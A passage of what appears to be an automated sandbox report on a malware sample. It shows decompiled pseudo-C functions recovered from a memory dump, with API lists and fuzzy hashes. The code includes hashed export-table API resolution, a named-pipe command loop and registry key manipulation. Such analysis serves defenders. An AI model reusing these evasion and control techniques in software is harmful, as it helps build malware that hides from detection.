    									asm("stosd");
    									asm("stosd");
    									asm("stosd");
    									_t206 =  *0x361e684; // 0x530f6c8
    									 *((intOrPtr*)(_t206 + 0xd8))( &_v608);
    									_t210 = _v602 + 0x00000002 & 0x0000ffff;
    									_v628 = _t210;
    									_t245 = 0x3c;
    									_v632 = _t210 / _t245 + _v604 & 0x0000ffff;
    									_t322 = E036085EA(0x1000);
    									_v624 = _t322;
    									_pop(_t276);
    									__eflags = _t322;
    									if(_t322 != 0) {
    										_t215 = E036095C7(_t276, 0x32d);
    										_t278 =  *0x361e688; // 0x33f0000
    										_push(_t278 + 0x228);
    										_push(_v628 % _t245 & 0x0000ffff);
    										_v636 = _t215;
    										E03609626(_t322, 0x1000, _t215, _v632 & 0x0000ffff);
    										E036085BB( &_v636);
    										E0360A8F7(_t322, 0, 0xbb8, 1);
    										E03608600( &_v624, 0xfffffffe);
    									}
    									goto L42;
    								}
    							}
    						} else {
    							_t233 =  *((intOrPtr*)(_t258 + 0x214));
    							__eflags = _t233 - 3;
    							if(_t233 == 3) {
    								goto L19;
    							}
    							__eflags =  *((intOrPtr*)(_t258 + 4)) - 6;
    							if( *((intOrPtr*)(_t258 + 4)) >= 6) {
    								L37:
    								_t142 = E036095C7(_t258, 0x610);
    								_push(_t242);
    								_push(_t142);
    								_v616 = _t142;
    								_t143 =  *0x361e688; // 0x33f0000
    								_t326 = E036092CB(_t143 + 0x228);
    								_v612 = _t326;
    								__eflags = _t326;
    								if(_t326 != 0) {
    									_t158 = E0360B24F(_t326);
    									__eflags = _t158;
    									if(_t158 != 0) {
    										_t161 =  *0x361e684; // 0x530f6c8
    										 *((intOrPtr*)(_t161 + 0x10c))(_t326);
    									}
    									E03608600( &_v612, 0xfffffffe);
    								}
    								E036085BB( &_v616);
    								_t148 =  *0x361e688; // 0x33f0000
    								lstrcpynW(_t148 + 0x438,  *0x361e740, 0x20a);
    								_t151 =  *0x361e688; // 0x33f0000
    								_t152 = _t151 + 0x228;
    								__eflags = _t152;
    								lstrcpynW(_t152,  *0x361e738, 0x20a);
    								_t328 =  *0x361e688; // 0x33f0000
    								_t115 = _t328 + 0x228; // 0x33f0228
    								 *((intOrPtr*)(_t328 + 0x434)) = E03608FA4(_t115, __eflags);
    								E03608600(0x361e740, 0xfffffffe);
    								E03608600(0x361e738, 0xfffffffe);
    								L42:
    								_t157 = 0;
    								__eflags = 0;
    								L43:
    								return _t157;
    							}
    							__eflags = _t233 - 2;
    							if(_t233 != 2) {
    								goto L37;
    							}
    							goto L19;
    						}
    					}
    					L9:
    					_t157 = _t120 | 0xffffffff;
    					goto L43;
    				}
    				_t246 = E036095AD(0x6e2);
    				_v616 = _t246;
    				_t323 = E036095AD(0x9f5);
    				_v612 = _t323;
    				if(_t246 == 0 || _t323 == 0) {
    					L7:
    					_t242 = 0;
    					goto L8;
    				} else {
    					if(GetModuleHandleA(_t246) != 0 || GetModuleHandleA(_t323) != 0) {
    						_v620 = 1;
    					}
    					E036085A8( &_v616);
    					_t120 = E036085A8( &_v612);
    					if(_v620 != 0) {
    						goto L9;
    					}
    					goto L7;
    				}
    			}

    APIs
    • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 03604DC2
    • GetModuleHandleA.KERNEL32(00000000), ref: 03604DC9
    • lstrcpynW.KERNEL32(033EFBC8,0000020A,?,?,?,?,?,?,?,?,?,00000000), ref: 03605257
    • lstrcpynW.KERNEL32(033EFDD8,0000020A,?,?,?,?,?,?,?,?,?,00000000), ref: 0360526B
      • Part of subcall function 0360B24F: GetFileAttributesW.KERNELBASE(00000000,03604E7E,?,00000000), ref: 0360B255
    Memory Dump Source
    • Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true
    Similarity
    • API ID: HandleModulelstrcpyn$AttributesFile
    • String ID:
    • API String ID: 1754255865-0
    • Opcode ID: f88d7c5fc7cc4df649d399531c960682cc6185d08d89037893365631d5f45499
    • Instruction ID: 2ab1c5bb92f87d0dd040db945c4823ef7191b131bcb79b667199e8d9b188b202
    • Opcode Fuzzy Hash: f88d7c5fc7cc4df649d399531c960682cc6185d08d89037893365631d5f45499
    • Instruction Fuzzy Hash: 6FE1FF71508301AFE318EF68D886E6BB3E9EF89314F48092EF645CB2D0DB71D9158B56
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 86%
    			E03609B29(char __ecx, int __edx, void* __fp0, int* _a4, int* _a8, int* _a12) {
    				void* _v8;
    				int _v12;
    				void* _v16;
    				void* _v20;
    				int _v24;
    				void* _v28;
    				char _v32;
    				char _v36;
    				int* _v40;
    				int** _v44;
    				void _v108;
    				int* _t90;
    				void* _t91;
    				char* _t92;
    				long _t96;
    				int* _t97;
    				int* _t101;
    				long _t111;
    				int* _t112;
    				intOrPtr _t122;
    				char* _t125;
    				intOrPtr _t126;
    				intOrPtr _t128;
    				int* _t129;
    				intOrPtr _t131;
    				int* _t133;
    				intOrPtr _t134;
    				int* _t135;
    				intOrPtr _t136;
    				char* _t139;
    				int _t143;
    				int _t147;
    				intOrPtr _t148;
    				int* _t149;
    				int* _t154;
    				int** _t155;
    				int* _t161;
    				int* _t163;
    				intOrPtr _t164;
    				intOrPtr _t171;
    				int _t176;
    				char* _t177;
    				char* _t178;
    				char _t179;
    				void* _t180;
    				void* _t181;
    				void* _t183;
    
    				_t176 = 0;
    				_v24 = __edx;
    				_t177 = 0;
    				_v32 = __ecx;
    				_v28 = 0;
    				_v8 = 0x80000001;
    				_v20 = 0;
    				_t155 = E036085EA(0x110);
    				_v44 = _t155;
    				if(_t155 != 0) {
    					_t158 = _a4;
    					_t155[0x42] = _a4;
    					E0360B5DC(_a4, __edx, __eflags, __fp0, _t158,  &_v108);
    					_t161 = _v108;
    					__eflags = _t161 - 0x61 - 0x19;
    					_t90 = _t161;
    					if(_t161 - 0x61 <= 0x19) {
    						_t90 = _t90 - 0x20;
    						__eflags = _t90;
    					}
    					_v108 = _t90;
    					_t91 = E036095AD(0x4d2);
    					_t163 = _v24;
    					_v16 = _t91;
    					__eflags = _t163;
    					if(_t163 == 0) {
    						L16:
    						_t164 =  *0x361e688; // 0x33f0000
    						__eflags =  *((intOrPtr*)(_t164 + 0x214)) - 3;
    						if( *((intOrPtr*)(_t164 + 0x214)) != 3) {
    							_push(_t176);
    							_push( &_v108);
    							_push("\\");
    							_t92 = E03609278(_t91);
    							_t181 = _t181 + 0x10;
    							L20:
    							_t177 = _t92;
    							_v20 = _t177;
    							goto L21;
    						}
    						_v24 = _t176;
    						_v8 = 0x80000003;
    						_t122 =  *0x361e68c; // 0x530f890
    						 *((intOrPtr*)(_t122 + 0x20))( *((intOrPtr*)( *((intOrPtr*)(_t164 + 0x110)))),  &_v24);
    						__eflags = _v24 - _t177;
    						if(_v24 == _t177) {
    							goto L21;
    						}
    						_push(_t176);
    						_push( &_v108);
    						_t125 = "\\";
    						_push(_t125);
    						_push(_v16);
    						_push(_t125);
    						_t92 = E03609278(_v24);
    						_t181 = _t181 + 0x18;
    						goto L20;
    					} else {
    						_t126 =  *0x361e688; // 0x33f0000
    						_t128 =  *0x361e68c; // 0x530f890
    						_t129 =  *((intOrPtr*)(_t128 + 0x68))(_t163,  *((intOrPtr*)( *((intOrPtr*)(_t126 + 0x110)))));
    						__eflags = _t129;
    						if(_t129 != 0) {
    							_t91 = _v16;
    							goto L16;
    						}
    						_v12 = _t176;
    						_t131 =  *0x361e68c; // 0x530f890
    						_v8 = 0x80000003;
    						 *((intOrPtr*)(_t131 + 0x20))(_v24,  &_v12);
    						__eflags = _v12 - _t177;
    						if(_v12 == _t177) {
    							L21:
    							E036085A8( &_v16);
    							_t96 = RegOpenKeyExA(_v8, _t177, _t176, 0x20019,  &_v28);
    							__eflags = _t96;
    							if(_t96 == 0) {
    								_t97 = _a8;
    								__eflags = _t97;
    								if(_t97 != 0) {
    									 *_t97 = 1;
    								}
    								_push(_v28);
    								L30:
    								RegCloseKey();
    								_t155[0x43] = _v8;
    								_t101 = E0360C384(_t177);
    								 *_t155 = _t101;
    								__eflags = _t101;
    								if(_t101 == 0) {
    									L32:
    									E03608600( &_v20, 0xffffffff);
    									return _t155;
    								} else {
    									goto L31;
    								}
    								do {
    									L31:
    									 *(_t155 + _t176 + 4) =  *(_t180 + (_t176 & 0x00000003) + 8) ^ _t177[_t176];
    									_t176 = _t176 + 1;
    									__eflags = _t176 -  *_t155;
    								} while (_t176 <  *_t155);
    								goto L32;
    							}
    							_v16 = _t176;
    							_t111 = RegCreateKeyA(_v8, _t177,  &_v16);
    							__eflags = _t111;
    							if(_t111 == 0) {
    								_t112 = _a8;
    								__eflags = _t112;
    								if(_t112 != 0) {
    									 *_t112 = _t176;
    								}
    								_push(_v16);
    								goto L30;
    							}
    							L23:
    							E03608600( &_v44, 0x110);
    							memset( &_v108, _t176, 0x40);
    							E03608600( &_v20, 0xffffffff);
    							goto L1;
    						}
    						_push(_t176);
    						_push(_v16);
    						_t178 = "\\";
    						_push(_t178);
    						_t133 = E03609278(_v12);
    						_t181 = _t181 + 0x10;
    						_v40 = _t133;
    						__eflags = _t133;
    						if(_t133 == 0) {
    							goto L23;
    						}
    						_t134 =  *0x361e68c; // 0x530f890
    						_t135 =  *((intOrPtr*)(_t134 + 0x14))(_v8, _t133, _t176, 0x20019,  &_v36);
    						__eflags = _t135;
    						if(_t135 == 0) {
    							_t136 =  *0x361e68c; // 0x530f890
    							 *((intOrPtr*)(_t136 + 0x1c))(_v36);
    						} else {
    							_t143 = E036095C7( &_v36, 0x34);
    							_v24 = _t143;
    							_t179 = E036092CB(_v32);
    							_v32 = _t179;
    							E036085BB( &_v24);
    							_t183 = _t181 + 0x18;
    							_t147 = E0360923C(_v12);
    							_v24 = _t147;
    							_t148 =  *0x361e68c; // 0x530f890
    							_t149 =  *((intOrPtr*)(_t148 + 0x30))(_v8, _t147, _t179, "\\", _t143, _t176);
    							__eflags = _t149;
    							if(_t149 == 0) {
    								_t154 = _a12;
    								__eflags = _t154;
    								if(_t154 != 0) {
    									 *_t154 = 1;
    								}
    							}
    							E03608600( &_v32, 0xfffffffe);
    							E03608600( &_v24, 0xfffffffe);
    							_t181 = _t183 + 0x10;
    							_t178 = "\\";
    						}
    						_t139 = E03609278(_v12);
    						_t171 =  *0x361e684; // 0x530f6c8
    						_t181 = _t181 + 0x18;
    						_t177 = _t139;
    						_v20 = _t177;
    						 *((intOrPtr*)(_t171 + 0x34))(_v12, _t178, _v16, _t178,  &_v108, _t176);
    						E03608600( &_v40, 0xffffffff);
    						goto L21;
    					}
    				}
    				L1:
    				return 0;
    			}

    Memory Dump Source
    • Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true
    Similarity
    • API ID: AllocateHeap
    • String ID:
    • API String ID: 1279760036-0
    • Opcode ID: bd30b8ee0378fb85fc0e1f0d44d5b8e15fbd50c0c4f88472c7668a3ceb9bfcbc
    • Instruction ID: 02b21cf7a34c914def7ae5c74348a39f7c477c39f3b7314360498a8aef835ba9
    • Opcode Fuzzy Hash: bd30b8ee0378fb85fc0e1f0d44d5b8e15fbd50c0c4f88472c7668a3ceb9bfcbc
    • Instruction Fuzzy Hash: 45916BB5900209AFCF18DFA4CC45DEFBBB9EF09310F184159E915AB2A6D7319A10CBA4
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 54%
    			E03603296() {
    				char _v8;
    				struct _OVERLAPPED* _v12;
    				struct _OVERLAPPED* _v16;
    				intOrPtr* _v20;
    				char _v24;
    				intOrPtr _v32;
    				signed int _v36;
    				intOrPtr* _v40;
    				char _v168;
    				char _v172;
    				intOrPtr _t41;
    				void* _t47;
    				char _t54;
    				char _t61;
    				intOrPtr _t64;
    				void* _t65;
    				void* _t68;
    				void* _t70;
    				void* _t72;
    				void* _t76;
    				struct _OVERLAPPED* _t82;
    				intOrPtr* _t83;
    				signed int _t84;
    				signed short* _t86;
    				intOrPtr* _t97;
    				signed short* _t105;
    				void* _t107;
    				void* _t108;
    				void* _t109;
    				intOrPtr* _t112;
    				struct _OVERLAPPED* _t113;
    				char _t114;
    				void* _t115;
    
    				_t113 = 0;
    				_t82 = 0;
    				_v8 = 0;
    				_v12 = 0;
    				while(1) {
    					_v16 = _t113;
    					if(ConnectNamedPipe( *0x361e674, _t113) == 0 && GetLastError() != 0x217) {
    						break;
    					}
    					_push(_t113);
    					_push( &_v16);
    					_t41 =  *0x361e684; // 0x530f6c8
    					_push(0x80000);
    					_push( *0x361e724);
    					_push( *0x361e674);
    					if( *((intOrPtr*)(_t41 + 0x88))() == 0 || _v16 == 0) {
    						GetLastError();
    					} else {
    						_t86 =  *0x361e724; // 0x57e7020
    						_t47 = ( *_t86 & 0x0000ffff) - 1;
    						if(_t47 == 0) {
    							_t112 = E036093A4( &(_t86[4]), 0x20, 1,  &_v24);
    							_v40 = _t112;
    							if(_t112 != 0) {
    								_t114 = _v24;
    								if(_t114 <= 1) {
    									_t113 = 0;
    									_t54 = E03601DA0(E0360972F( *_t112), 0, 0, 0);
    									_t115 = _t115 + 0x10;
    									_v172 = _t54;
    								} else {
    									_v36 = _t114 - 1;
    									_t83 = E036085EA(_t114 - 1 << 2);
    									_v32 = _t83;
    									if(_t83 == 0) {
    										_t113 = 0;
    									} else {
    										if(_t114 > 1) {
    											_v20 = _t83;
    											_t84 = 1;
    											do {
    												_t64 = E0360918C( *((intOrPtr*)(_t112 + _t84 * 4)), E0360C384( *((intOrPtr*)(_t112 + _t84 * 4))));
    												_t97 = _v20;
    												_t84 = _t84 + 1;
    												 *_t97 = _t64;
    												_v20 = _t97 + 4;
    											} while (_t84 < _t114);
    											_t83 = _v32;
    										}
    										_t113 = 0;
    										_t61 = E03601DA0(E0360972F( *_t112), _t83, _v36, 0);
    										_t115 = _t115 + 0x10;
    										_v172 = _t61;
    										E0360949D( &_v24);
    									}
    									_t82 = _v12;
    								}
    							}
    							_t105 =  *0x361e724; // 0x57e7020
    							E036096B0( &_v168,  &(_t105[4]), 0x80);
    							_push(0x84);
    							_push( &_v172);
    							_push(2);
    							goto L33;
    						} else {
    							_t65 = _t47 - 3;
    							if(_t65 == 0) {
    								_push(_t113);
    								_push(_t113);
    								_t108 = 5;
    								E0360C324(_t108);
    								 *0x361e758 = 1;
    								_t82 = 1;
    								_v12 = 1;
    							} else {
    								_t68 = _t65;
    								if(_t68 == 0) {
    									_t70 = E0360F7AA( &_v8);
    									goto L13;
    								} else {
    									_t72 = _t68 - 1;
    									if(_t72 == 0) {
    										E0360F7AA( &_v8);
    										goto L16;
    									} else {
    										_t76 = _t72 - 1;
    										if(_t76 == 0) {
    											_t70 = E0360F7CC( &_v8);
    											L13:
    											if(_t70 == 0) {
    												_push(_t113);
    												_push(_t113);
    												_push(0xa);
    											} else {
    												_push(_v8);
    												_push(_t70);
    												_push(5);
    											}
    											_pop(_t109);
    											E0360C324(_t109);
    										} else {
    											if(_t76 == 1) {
    												E0360F7CC( &_v8);
    												L16:
    												_push(4);
    												_push( &_v8);
    												_push(5);
    												L33:
    												_pop(_t107);
    												E0360C324(_t107);
    												_t115 = _t115 + 0xc;
    											}
    										}
    									}
    								}
    							}
    						}
    					}
    					DisconnectNamedPipe( *0x361e674);
    					if(_t82 == 0) {
    						continue;
    					}
    					break;
    				}
    				return 0;
    			}

    APIs
    • ConnectNamedPipe.KERNELBASE(00000000), ref: 036032BB
    • GetLastError.KERNEL32 ref: 036032C5
      • Part of subcall function 0360C324: FlushFileBuffers.KERNEL32(000003BC,?,?,?,03603498,?,00000084,00000080), ref: 0360C36A
    • DisconnectNamedPipe.KERNEL32 ref: 036034A9
    Memory Dump Source
    • Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true
    Similarity
    • API ID: NamedPipe$BuffersConnectDisconnectErrorFileFlushLast
    • String ID:
    • API String ID: 2389948835-0
    • Opcode ID: 4dc74f5bb4c94b974017621dfd13539b386bbac529d99ee07e8d3ff97265e222
    • Instruction ID: c0a093ef65bb20c359078393654153377ec9d1784a73bf7aa1501edf7dcdeff2
    • Opcode Fuzzy Hash: 4dc74f5bb4c94b974017621dfd13539b386bbac529d99ee07e8d3ff97265e222
    • Instruction Fuzzy Hash: 1951E639D00315ABDB19EFB4D98AAAFB7B8EB05311F28012AE505DB3C4DB35D904CB61
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 80%
    			E0360619A(void* __edx, void* __fp0, void* _a4, short* _a8, intOrPtr _a12, intOrPtr _a16) {
    				void* _v8;
    				int _v12;
    				int _v16;
    				int _v20;
    				char _v24;
    				char _v28;
    				void* _v32;
    				void* _v36;
    				char _v40;
    				char _v44;
    				char _v48;
    				char _v56;
    				void _v576;
    				void* _t53;
    				intOrPtr _t63;
    				intOrPtr _t72;
    				intOrPtr _t80;
    				intOrPtr _t81;
    				intOrPtr _t82;
    				signed int _t85;
    				intOrPtr _t87;
    				int _t89;
    				intOrPtr _t90;
    				intOrPtr _t92;
    				void* _t96;
    				void* _t97;
    				void* _t98;
    				void* _t99;
    				void* _t100;
    				void* _t108;
    
    				_t108 = __fp0;
    				_t96 = __edx;
    				_t89 = 0;
    				_v8 = 0;
    				memset( &_v576, 0, 0x208);
    				_v28 = 0x104;
    				_v20 = 0x3fff;
    				_v16 = 0;
    				_t53 = E036085EA(0x3fff); // executed
    				_t98 = _t53;
    				_t100 = _t99 + 0x10;
    				_v32 = _t98;
    				if(_t98 == 0) {
    					L18:
    					return 0;
    				}
    				_t97 = E036085EA(0x800);
    				_v36 = _t97;
    				if(_t97 == 0) {
    					goto L18;
    				}
    				if(RegOpenKeyExW(_a4, _a8, 0, 0x2001f,  &_v8) != 0) {
    					L15:
    					if(_v8 != 0) {
    						_t63 =  *0x361e68c; // 0x530f890
    						 *((intOrPtr*)(_t63 + 0x1c))(_v8);
    					}
    					E03608600( &_v32, 0x3fff); // executed
    					E03608600( &_v36, 0x800); // executed
    					goto L18;
    				}
    				_push( &_v56);
    				_push( &_v40);
    				_push( &_v44);
    				_push( &_v48);
    				_push( &_v24);
    				_push(0);
    				_push(0);
    				_push(0);
    				_push(0);
    				_push( &_v28);
    				_push( &_v576);
    				_t72 =  *0x361e68c; // 0x530f890
    				_push(_v8);
    				if( *((intOrPtr*)(_t72 + 0xb0))() == 0) {
    					__eflags = _v24;
    					if(_v24 == 0) {
    						goto L15;
    					}
    					_v12 = 0;
    					do {
    						memset(_t97, 0, 0x800);
    						memset(_t98, 0, 0x3fff);
    						_t100 = _t100 + 0x18;
    						_v20 = 0x3fff;
    						_v16 = 0x800;
    						 *_t98 = 0;
    						_t80 =  *0x361e68c; // 0x530f890
    						_t81 =  *((intOrPtr*)(_t80 + 0xc8))(_v8, _t89, _t98,  &_v20, 0, 0, _t97,  &_v16);
    						__eflags = _t81;
    						if(_t81 == 0) {
    							_t82 =  *0x361e690; // 0x530f968
    							_t90 =  *((intOrPtr*)(_t82 + 4))(_t97, _a12);
    							__eflags = _t90;
    							if(_t90 != 0) {
    								_t92 =  *0x361e68c; // 0x530f890
    								 *((intOrPtr*)(_t92 + 0xa8))(_v8, _t98);
    								__eflags = _a16;
    								if(_a16 != 0) {
    									_t85 = E0360C39D(_t90);
    									__eflags =  *((short*)(_t90 + _t85 * 2 - 2)) - 0x22;
    									if(__eflags == 0) {
    										__eflags = 0;
    										 *((short*)(_t90 + _t85 * 2 - 2)) = 0;
    									}
    									E0360B197(_t90, _t96, __eflags, _t108);
    								}
    							}
    							_t89 = _v12;
    						}
    						_t89 = _t89 + 1;
    						_v12 = _t89;
    						__eflags = _t89 - _v24;
    					} while (_t89 < _v24);
    					goto L15;
    				}
    				_t87 =  *0x361e68c; // 0x530f890
    				 *((intOrPtr*)(_t87 + 0x1c))(_v8);
    				goto L15;
    			}

    APIs
    • memset.MSVCRT ref: 036061B8
      • Part of subcall function 036085EA: RtlAllocateHeap.NTDLL(00000008,?,?,03608F6A,00000100,?,03605FA8), ref: 036085F8
    • RegOpenKeyExW.KERNELBASE(?,?,00000000,0002001F,?,?,?,00000001), ref: 03606212
    • memset.MSVCRT ref: 0360627B
    • memset.MSVCRT ref: 03606288
    Memory Dump Source
    • Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true
    Similarity
    • API ID: memset$AllocateHeapOpen
    • String ID:
    • API String ID: 2508404634-0
    • Opcode ID: 1ed09117f89761408ec81c79fa0b5a7014ee93974067b86f58a660e6074b9c1a
    • Instruction ID: 8af98f8aa2543e60ff0c285946798f05793940231451957207e120e2865ec9ab
    • Opcode Fuzzy Hash: 1ed09117f89761408ec81c79fa0b5a7014ee93974067b86f58a660e6074b9c1a
    • Instruction Fuzzy Hash: DA513B71900209AFDB19EFA4CD86FAFBBBCEF04300F144069F505EB285D7309A148BA5
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0360BF42(short* __edx, short* _a4) {
    				void* _v8;
    				int _v12;
    				int _v16;
    				char* _v20;
    				char* _t30;
    				intOrPtr _t31;
    				char* _t49;
    
    				_v16 = 0;
    				_v12 = 0;
    				_v8 = 0;
    				if(RegOpenKeyExW(0x80000002, __edx, 0, 0x20019,  &_v8) == 0) {
    					if(RegQueryValueExW(_v8, _a4, 0,  &_v16, 0,  &_v12) != 0) {
    						L6:
    						if(_v8 != 0) {
    							_t31 =  *0x361e68c; // 0x530f890
    							 *((intOrPtr*)(_t31 + 0x1c))(_v8);
    						}
    						_t30 = 0;
    						L9:
    						return _t30;
    					}
    					_t49 = E036085EA(_v12);
    					_v20 = _t49;
    					if(_t49 == 0) {
    						goto L6;
    					}
    					if(RegQueryValueExW(_v8, _a4, 0, 0, _t49,  &_v12) == 0) {
    						RegCloseKey(_v8);
    						_t30 = _t49;
    						goto L9;
    					}
    					E03608600( &_v20, 0xfffffffe);
    					goto L6;
    				}
    				return 0;
    			}

    APIs
    • RegOpenKeyExW.KERNELBASE(80000002,00000000,00000000,00020019,00000000,00000000,?,?,03602C08,00000000), ref: 0360BF69
    • RegQueryValueExW.KERNELBASE(00000000,03602C08,00000000,?,00000000,03602C08,00000000,?,?,03602C08,00000000), ref: 0360BF8D
    • RegQueryValueExW.KERNELBASE(00000000,03602C08,00000000,00000000,00000000,03602C08,?,?,03602C08,00000000), ref: 0360BFBB
    • RegCloseKey.KERNELBASE(00000000,?,?,03602C08,00000000,?,?,?,?,?,?,?,000000AF,?), ref: 0360BFF0
    Memory Dump Source
    • Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true
    Similarity
    • API ID: QueryValue$CloseOpen
    • String ID:
    • API String ID: 1586453840-0
    • Opcode ID: 444e34a2df4628c754d712074b2b90522dccedd057d90ce601a13d34c82724e3
    • Instruction ID: 9bb72e16af534e3f84edfb058fc4f2a8dda0f9ef22a08097c4c88ae27107e8a8
    • Opcode Fuzzy Hash: 444e34a2df4628c754d712074b2b90522dccedd057d90ce601a13d34c82724e3
    • Instruction Fuzzy Hash: 16213A75900208FFCB14DBA5DC05EAFBBB8EB45700B1581AAB501E7154E731CA10DB50
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0360BEA6(void* __ecx, char* __edx, char* _a4, intOrPtr* _a12) {
    				void* _v8;
    				int _v12;
    				int _v16;
    				intOrPtr* _t43;
    				char* _t46;
    
    				_t46 = 0;
    				_v8 = 0;
    				_v16 = 0;
    				if(RegOpenKeyExA(__ecx, __edx, 0, 0x20019,  &_v8) != 0) {
    					return 0;
    				}
    				_v12 = 0;
    				if(RegQueryValueExA(_v8, _a4, 0,  &_v16, 0,  &_v12) == 0) {
    					_t46 = E036085EA(_v12 + 1);
    					if(_t46 != 0 && RegQueryValueExA(_v8, _a4, 0,  &_v16, _t46,  &_v12) == 0) {
    						_t43 = _a12;
    						if(_t43 != 0) {
    							 *_t43 = _v12;
    						}
    					}
    				}
    				if(_v8 != 0) {
    					RegCloseKey(_v8);
    				}
    				return _t46;
    			}

    APIs
    • RegOpenKeyExA.KERNELBASE(?,00000000,00000000,00020019,?,0530F9F0,00000000,?,00000002), ref: 0360BEC9
    • RegQueryValueExA.KERNELBASE(?,00000002,00000000,?,00000000,00000002,?,00000002), ref: 0360BEEC
    • RegQueryValueExA.KERNELBASE(?,00000002,00000000,?,00000000,00000002,?,00000002), ref: 0360BF19
    • RegCloseKey.KERNELBASE(?,?,00000002), ref: 0360BF39
    Memory Dump Source
    • Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true
    Similarity
    • API ID: QueryValue$CloseOpen
    • String ID:
    • API String ID: 1586453840-0
    • Opcode ID: b9947fde0fcba9e81404b7b4225b702eb73ce67b7f3f6d19925f008830e18b30
    • Instruction ID: b8f018686481d4dc9318f7d055b67365090fc70a06a725f46936a066b9cb96a1
    • Opcode Fuzzy Hash: b9947fde0fcba9e81404b7b4225b702eb73ce67b7f3f6d19925f008830e18b30
    • Instruction Fuzzy Hash: 0721EAB5A00248BFCB19DFA9D945DAFBBBCEF85700B058195F901D7254D730DA10DB60
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0360DFB8(void* __ecx, intOrPtr __edx) {
    				signed int _v8;
    				intOrPtr _v12;
    				intOrPtr _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				char _v92;
    				intOrPtr _t41;
    				signed int _t47;
    				signed int _t49;
    				signed int _t51;
    				void* _t56;
    				struct HINSTANCE__* _t58;
    				_Unknown_base(*)()* _t59;
    				intOrPtr _t60;
    				void* _t62;
    				intOrPtr _t63;
    				void* _t69;
    				char _t70;
    				void* _t75;
    				CHAR* _t80;
    				void* _t82;
    
    				_t75 = __ecx;
    				_v12 = __edx;
    				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
    				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
    				if(_t41 == 0) {
    					L4:
    					return 0;
    				}
    				_t62 = _t41 + __ecx;
    				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
    				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
    				_t63 =  *((intOrPtr*)(_t62 + 0x18));
    				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
    				_t47 = 0;
    				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
    				_v8 = 0;
    				_v16 = _t63;
    				if(_t63 == 0) {
    					goto L4;
    				} else {
    					goto L2;
    				}
    				while(1) {
    					L2:
    					_t49 = E0360D40B( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E0360C384( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
    					_t51 = _v8;
    					if((_t49 ^ 0x218fe95b) == _v12) {
    						break;
    					}
    					_t73 = _v20;
    					_t47 = _t51 + 1;
    					_v8 = _t47;
    					if(_t47 < _v16) {
    						continue;
    					}
    					goto L4;
    				}
    				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
    				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
    				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
    					return _t80;
    				} else {
    					_t56 = 0;
    					while(1) {
    						_t70 = _t80[_t56];
    						if(_t70 == 0x2e || _t70 == 0) {
    							break;
    						}
    						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
    						_t56 = _t56 + 1;
    						if(_t56 < 0x40) {
    							continue;
    						}
    						break;
    					}
    					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
    					 *((char*)(_t82 + _t56 - 0x54)) = 0;
    					if( *((char*)(_t56 + _t80)) != 0) {
    						_t80 =  &(( &(_t80[1]))[_t56]);
    					}
    					_t40 =  &_v92; // 0x6c6c642e
    					_t58 = LoadLibraryA(_t40); // executed
    					if(_t58 == 0) {
    						goto L4;
    					}
    					_t59 = GetProcAddress(_t58, _t80);
    					if(_t59 == 0) {
    						goto L4;
    					}
    					return _t59;
    				}
    			}

    APIs
    • LoadLibraryA.KERNELBASE(.dll,0360604A,0000011C,00000000), ref: 0360E088
    • GetProcAddress.KERNEL32(00000000,8DF08B59), ref: 0360E094
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true
    Similarity
    • API ID: AddressLibraryLoadProc
    • String ID: .dll
    • API String ID: 2574300362-2738580789
    • Opcode ID: e8d9c10082e60b928be0ae4bb1cb428fd3464872b6c061c2aaa6c62e03aee741
    • Instruction ID: 37c869a92bc4d96938bf30fa061d90a24b5e38694dc76b080d73d04c2617edf8
    • Opcode Fuzzy Hash: e8d9c10082e60b928be0ae4bb1cb428fd3464872b6c061c2aaa6c62e03aee741
    • Instruction Fuzzy Hash: 2631B435A006299BDB28CF6DCA817AFFBE5AF44204F284869C846D7385D771E952C790
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 82%
    			E0360A091(signed int __ecx, char* __edx, void* __fp0, void* _a4, char _a8, char _a12) {
    				char* _v12;
    				char _v16;
    				int _v20;
    				signed int _v24;
    				intOrPtr _v28;
    				char* _v32;
    				char _v52;
    				char _v64;
    				char _v328;
    				char _v2832;
    				signed int _t48;
    				signed int _t49;
    				char* _t54;
    				long _t73;
    				long _t80;
    				long _t83;
    				void* _t88;
    				char* _t89;
    				intOrPtr _t90;
    				void* _t103;
    				void* _t104;
    				char* _t106;
    				intOrPtr _t107;
    				char _t108;
    
    				_t48 = __ecx;
    				_t89 = __edx;
